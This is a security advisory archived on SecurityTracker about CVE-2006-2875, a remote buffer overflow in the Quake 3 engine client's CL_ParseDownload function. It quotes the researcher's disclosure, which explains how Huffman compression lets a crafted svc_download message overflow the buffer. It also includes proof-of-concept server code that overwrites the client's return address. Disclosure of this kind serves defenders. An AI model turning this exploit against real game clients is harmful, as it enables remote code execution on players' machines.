SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   Quake Vendors:   id Software, Inc.
Quake 3 Buffer Overflow in CL_ParseDownload() Permits Remote Code Execution
SecurityTracker Alert ID:  1016219
SecurityTracker URL:  http://securitytracker.com/id/1016219
CVE Reference:   CVE-2006-2875   (Links to External Site)
Updated:  May 22 2009
Original Entry Date:  Jun 5 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): Quake 3; 1.32c; also Icculus.org Quake 3 revision 795 and prior versions
Description:   Luigi Auriemma reported a vulnerability in Quake. A remote server can execute arbitrary code on the target user's system.

The CL_ParseDownload function() in 'code/client/cl_parse.c' in the client code does not properly parse svc_download commands received from the connected server. A remote server can send specially crafted data to the connected client to trigger a buffer overflow and execute arbitrary code on the target system. The code will run with the privileges of the target user.

Impact:   A remote server can execute arbitrary code on the target user's system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.idsoftware.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Client buffer-overflow in Quake 3 engine (1.32c / rev 795)


#######################################################################

                             Luigi Auriemma

Application:  Quake 3 engine
              http://www.idsoftware.com
              http://www.icculus.org/quake3/
Versions:     Quake 3               <= 1.32c
              Icculus.org Quake 3   <= revision 795
              other derived projects
Games:        exist many games which use the Quake 3 engine and
              probably they are all vulnerable but I'm not able and
              have no time to test them.
              An enough complete list of these games is available here:
                http://en.wikipedia.org/wiki/Quake_III_engine#Uses_of_the_engine
Platforms:    Windows, *nix, *BSD, Mac and others
Bug:          buffer-overflow in CL_ParseDownload
Exploitation: remote, versus client
Date:         02 Jun 2006
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


The Quake 3 engine is the famous game engine developed by id Software
(http://www.idsoftware.com) in the far 1999 but is still one of the
most used, licensed and played engines.
It has been released open source under the GPL license some months ago
and now it's mainly maintained by Icculus
(http://www.icculus.org/quake3/) although exist many other derived
projects.


#######################################################################

======
2) Bug
======


The CL_ParseDownload function located in code/client/cl_parse.c is used
by the clients for handling the download commands (svc_download)
received from the server.

The function uses a signed 16 bit number sent by the server for copying
raw data from the network to the data buffer of 16384 (MAX_MSGLEN)
bytes:

void CL_ParseDownload ( msg_t *msg ) {
    int     size;
    unsigned char data[MAX_MSGLEN];
    ...
    size = MSG_ReadShort ( msg );
    if (size > 0)
        MSG_ReadData( msg, data, size );
    ...

Some interesting details:
The (reassembled) packets handled by Quake 3 can be max 16384 bytes but
is possible to bypass this limit through the huffman compression used
automatically and trasparently in the engine (thanx to Thilo Schulz).
In short for exploiting this bug is enough to use 16384 NULL (0x00)
bytes, which occupy a very small amount of space, followed by the
usual "stuff" (return address to overwrite and shellcode).
The data copied with the MSG_ReadData is raw so there are no bad bytes
to avoid for the exploitation.
Note that the svc_download can be sent to the client in any moment so
the client can be attacked also immediately after the ending of the
connect handshake (just the first server's message).


#######################################################################

===========
3) The Code
===========


The server must be modified for sending the malformed svc_download
command and is possible to use the following instructions which
demonstrate how to overwrite the return address with 0x61616161.
It's enough to place them in code/server/sv_client.c just after the
"// send the gamestate" comment at about line 575:

    // send the gamestate
    int     i;
    MSG_WriteByte( &msg, svc_download );
    MSG_WriteShort( &msg, -1 );         // block != 0, for fast return
    MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy
    for(i = 0; i < 16384; i++) {        // overwrite the data buffer
        MSG_WriteByte(&msg, 0x00);      // 0x00 for saving space
    }
    for(i = 0; i < 32; i++) {           // do the rest of the job
        MSG_WriteByte(&msg, 'a');       // return address: 0x61616161
    }
    SV_SendMessageToClient( &msg, client );
    return;


#######################################################################

======
4) Fix
======


Icculus will fix the code soon.
I have tried to contact id Software too but it's only time lost...
The developers of the other derived projects and games have not been
contacted (almost all the games are no longer supported and it's a bit
long for me to find and contact each single developer of the other
open source projects).


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC